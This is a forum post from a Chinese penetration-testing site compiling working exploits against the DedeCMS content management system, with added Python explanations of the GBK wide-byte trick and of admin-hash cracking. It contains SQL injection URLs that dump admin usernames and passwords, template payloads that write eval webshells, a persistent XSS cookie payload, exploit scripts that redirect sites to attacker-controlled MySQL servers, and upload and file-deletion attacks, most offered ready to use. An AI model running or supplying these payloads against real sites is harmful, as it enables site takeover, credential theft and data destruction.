中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: DedeCMS vulnerability summary

Author: admin    Time: 2012-10-18 10:42
Title: DedeCMS vulnerability summary

Dedecms 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
The injected array key of _Cs closes the query and uses updatexml() to raise an error whose text leaks uname and MID(pwd,4,16) from dede_admin, wrapped in [ and ] (0x5b / 0x5d).

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and submit a software item; in the "local address" field enter:
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code. To drop a shell instead:
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php, a one-line shell with password xiao (the two base64 strings decode to x.php and <?php eval($_POST[xiao])?>baidu).

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
The percent-encoded bytes are the UTF-8 form of 涛声依旧; the last byte (0xA7) is a valid GBK lead byte, which is what the wide-byte trick depends on: it swallows the backslash that addslashes() puts in front of the following quote.
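The mechanism behind the three uid= URLs above, as an added example that is not code from the original post: a byte-level model of PHP's addslashes() and of how a MySQL connection using GBK re-reads the escaped bytes. The WHERE clause shape in render_where() is a hypothetical stand-in, not DedeCMS's real query; the sample inputs are constructed here (the second one is the uid= value of the first URL, percent-decoded to raw bytes).

```python
import urllib.parse

# Added example: why a lead byte in 0x81-0xFE makes addslashes() useless when
# MySQL parses the escaped bytes as GBK. Not code from the original post.


def php_addslashes(data: bytes) -> bytes:
    """Byte-for-byte model of PHP addslashes(): prefix ' " \\ and NUL with 0x5C."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes that still act as string delimiters once the escaped
    bytes are decoded with the connection character set (what the SQL parser sees)."""
    text = escaped.decode(charset, errors="replace")
    return sum(1 for i, ch in enumerate(text)
               if ch == "'" and (i == 0 or text[i - 1] != "\\"))


def has_swallowed_backslash(escaped: bytes) -> bool:
    """Heuristic check on escaped bytes: a GBK lead byte (0x81-0xFE) immediately
    followed by 0x5C means that backslash is consumed as the trail byte of a
    two-byte character instead of escaping what comes next."""
    return any(0x81 <= escaped[i] <= 0xFE and escaped[i + 1] == 0x5C
               for i in range(len(escaped) - 1))


def render_where(uid: bytes, charset: str) -> str:
    """Hypothetical WHERE clause (assumption, not DedeCMS's real SQL) showing the
    string the parser reads after escaping and decoding."""
    return "WHERE uid='" + php_addslashes(uid).decode(charset, errors="replace") + "'"


# Constructed inputs: the classic single lead byte before a quote, and the uid=
# value from the first URL above. Its last text byte 0xA7 is a GBK lead byte.
CLASSIC = b"\xdf'"
PAGE_UID = urllib.parse.unquote_to_bytes(
    "''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';")

if __name__ == "__main__":
    for label, raw in (("ascii", b"a'"), ("classic", CLASSIC), ("page uid", PAGE_UID)):
        esc = php_addslashes(raw)
        print(label, "gbk:", unescaped_quotes(esc, "gbk"),
              "latin-1:", unescaped_quotes(esc, "latin-1"),
              "swallowed:", has_swallowed_backslash(esc))
        print("  ", render_where(raw, "gbk"))
```

The same bytes are harmless under latin-1 and break out under gbk, which is why the fix is not a better escaping function but escaping with the real connection charset (mysql_set_charset() before mysql_real_escape_string()) or prepared statements; has_swallowed_backslash() is only a detection heuristic for raw request bytes.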

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy the URL below into the browser and visit it: this triggers the XSS and installs the XSS "rootkit". Note that IE8/9 block URL-based XSS, so their XSS filter has to be turned off first.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

The String.fromCharCode payload decodes to a script that stores the reflected string "><script>alert(/xss rootkit!/)</script><x=" in a gotopage cookie with a 365-day expiry (document.cookie='gotopage='+...), which is why the next step persists.

2. Close the browser; afterwards any of the following URLs triggers our XSS, however it is visited.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
Exploit script for the mytag_js.php variable overwrite (the same technique as the tag remote file write section below): it POSTs _COOKIE[GLOBALS][cfg_db*] values that redirect the database connection to an attacker-controlled MySQL server.

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the first response line, so this matches the "OK" in
// "HTTP/1.1 200 OK" (offset 13), not the "OK" echoed by the injected {dede:php} tag.
if (strpos($exp,"OK")>12){
echo "\nExploit Success \n";
if($aid==1)echo "\nShell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "\nShell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "\nShell:".$url."/$path/plus/fuck.php\n";
}else{
echo "\nExploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// POST body. The _COOKIE[GLOBALS][cfg_db*] fields overwrite the database settings,
// so mytag_js.php reads its tag from the author's MySQL server (host, user,
// password and database name are hardcoded below).
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "\nNo response from ".$host."\n";
return '';
}
fwrite($ock,$data);
// Read and return only the first line of the response (the HTTP status line).
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 privilege bypass vulnerability (straight into the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current CAPTCHA value and the request logs you straight into the site backend. The _POST[GLOBALS][cfg_db*] parameters point the login at an attacker-controlled database, so the userid/pwd pair only has to match what that database holds.

Prerequisite: the backend directory must be known (织梦网站后台 in the URL stands for it).

Dedecms (织梦) tag remote file write vulnerability
Prerequisite: set up your own DedeCMS database reachable from the target, then insert the tag record (as posted, the string given to fwrite() is empty, so 1.php is created empty):
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit the form below; the shell appears as 1.php in the same directory. Work out the details yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the URL typed into the doaction field before it is submitted.
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image. Then, in attachment management, replace the image with a crafted template; for example the image name is:
uploads/userup/2/12OMX04-15A.jpg

Template content (if image formats are restricted, prefix it with gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>
<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)
<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)
<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)
<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(this is the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">Content</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;><img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>CAPTCHA:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read? Click to refresh" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>
</div>
</form>

Submit; if it reports that the edit succeeded, the template path has been changed. The templet field is accepted because dede_addonfields lists it as an extra field to save.
3. Visit the edited article. Assuming the aid of the article just edited is 2, just visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save the above as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >Change</button>
</form>

Build the form above; after the upload the image is saved as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>


织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
The oldface path is not normalised, so the ../ sequences escape the avatar directory and any file the web server user can write to is deleted.


织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
(%23@__ is #@__, DedeCMS's table-prefix placeholder, so this reads dede_admin on a default install.)
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character hash; removing 3 more from the front and 1 from the end of that gives the standard 16-character MD5.
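The hash arithmetic in the note above, and the MID(pwd,4,16) in the rss.php payload at the top of the post, as an added example that is not code from the original post. It assumes DedeCMS stores substr(md5($pwd),5,20) in the pwd column, which is what the note describes; the wordlist is constructed here.

```python
import hashlib

# Added example: DedeCMS's 20-character admin hash and how to turn it back into a
# standard 16-character MD5 for offline cracking. Not code from the original post.


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_hash20(password: str) -> str:
    """DedeCMS stores substr(md5($pwd), 5, 20): the 32-char MD5 with the first 5
    and the last 7 hex chars dropped (assumption stated in the lead-in)."""
    return md5_hex(password)[5:25]


def md5_16(password: str) -> str:
    """The common 16-char MD5 is the middle of the 32-char digest, md5[8:24]."""
    return md5_hex(password)[8:24]


def dede20_to_md5_16(h20: str) -> str:
    """Drop 3 chars from the front and 1 from the end of the 20-char hash. This is
    md5[8:24], the same slice SQL's 1-indexed MID(pwd,4,16) extracts in the
    rss.php payload, so it can be fed straight to a standard MD5 cracker."""
    h20 = h20.strip().lower()
    if len(h20) != 20 or any(c not in "0123456789abcdef" for c in h20):
        raise ValueError("expected a 20-character hex DedeCMS hash")
    return h20[3:19]


def recover_password(h20: str, candidates):
    """Offline dictionary check: compare the recovered 16-char MD5 against each
    candidate. Returns the matching word or None."""
    target = dede20_to_md5_16(h20)
    for word in candidates:
        if md5_16(word) == target:
            return word
    return None


if __name__ == "__main__":
    stored = dede_hash20("admin")          # what the admin table would hold
    print("20-char:", stored)
    print("16-char:", dede20_to_md5_16(stored))
    print("match:", recover_password(stored, ["123456", "password", "admin"]))
```

Because the 20-character value is a pure substring of the digest, nothing is lost by converting: every 16-character MD5 wordlist hit is also a valid login for the DedeCMS account.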

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialized variable vulnerability
With register_globals on, the cfg_* whitelist variables that select_soft_post.php relies on are never initialised before use, so the POST fields below (cfg_imgtype/cfg_softtype/cfg_mediatype=php) are accepted and the upload is written as newname under activepath.
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action='http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php' method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
Exploits a MySQL numeric overflow error together with the fact that DedeCMS records database error messages in a PHP file (data/mysql_error_trace.php) whose header does not stop the file from executing.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following shows the injection worked:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
(int(3) is the output of the injected var_dump(3), so the PHP written into the log file is being executed, and the file now evaluates whatever is POSTed as x.)

3. Run test.html from dede.rar, noting that the form's action is:
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
Press OK; seeing the step 2 output again means the trojan file was uploaded successfully.


织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
(%cf before the quote is the same wide-byte trick as in the GBK injection above: 0xCF is a GBK lead byte that absorbs the escaping backslash.)





Welcome to 中国网络渗透测试联盟 (China Network Penetration Testing Alliance) (https://cobjon.com/) Powered by Discuz! X3.2